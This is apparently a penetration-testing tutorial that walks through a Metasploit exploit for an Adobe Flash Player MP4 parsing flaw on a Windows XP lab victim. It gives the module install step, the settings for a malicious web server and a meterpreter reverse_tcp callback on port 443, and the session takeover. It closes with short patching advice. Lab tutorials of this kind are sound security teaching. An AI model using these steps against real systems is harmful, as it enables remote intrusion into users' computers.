Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP 3
Vulnerable Application : Adobe Flash Player
Exploit Credits : Alexander Gavrun, Abysssec, Sinn3r
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild.
Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
1. Vulnerable Adobe Flash Player (download link)
2. Adobe Flash sps Exploit
cp adobe_flash_sps.rb /pentest/exploits/framework/modules/exploits/windows/browser/
2. Run your Metasploit using msfconsole command, and use the exploit you've just added on step 1.
I'm still using meterpreter reverse_tcp as my favourite payload until now 😛
3. Use show options command to view available switch for this exploit and the payload that you need to configure to perform this attack. In this picture below I'm only configure the basic thing to make this exploit work.
Information :set srvhost 192.168.1.5 --> set ip address for computer act as attacker server set srvport 80 --> set port that used to serve incoming connection set swf_player_uri http://www.jeroenwijering.com/embed/mediaplayer.swf --> this one used to trigger the bug set uripath flashplayer --> this for make the URL more friendly set lhost 192.168.1.5 --> set ip of the attacker host that will handle connect back from victim set lport 443 --> connect back port that use for incoming connection from victim exploit --> run the server + payload
4. After we run exploit command, we will start to act as attacker webserver and ready to receive a connection. Our attacker webserver can be accessed by victim using an address that already described on step 3. The following picture below was taken when victim accessed the URL.
5. Yep we're already interacting with the victim, and if we see on step 4 the exploit try to migrate its process into notepad.exe. Use sessions -i 1 to interract with active session number 1. (to view the list of active sessions, run sessions -l command).
Pwn3D!! we're in 🙂
1. Update your Adobe flash player into the latest version
2. Do not open a URL sent by someone you didn't know(even the people you know) if you didn't know what it is.
Hope you enjoyed 🙂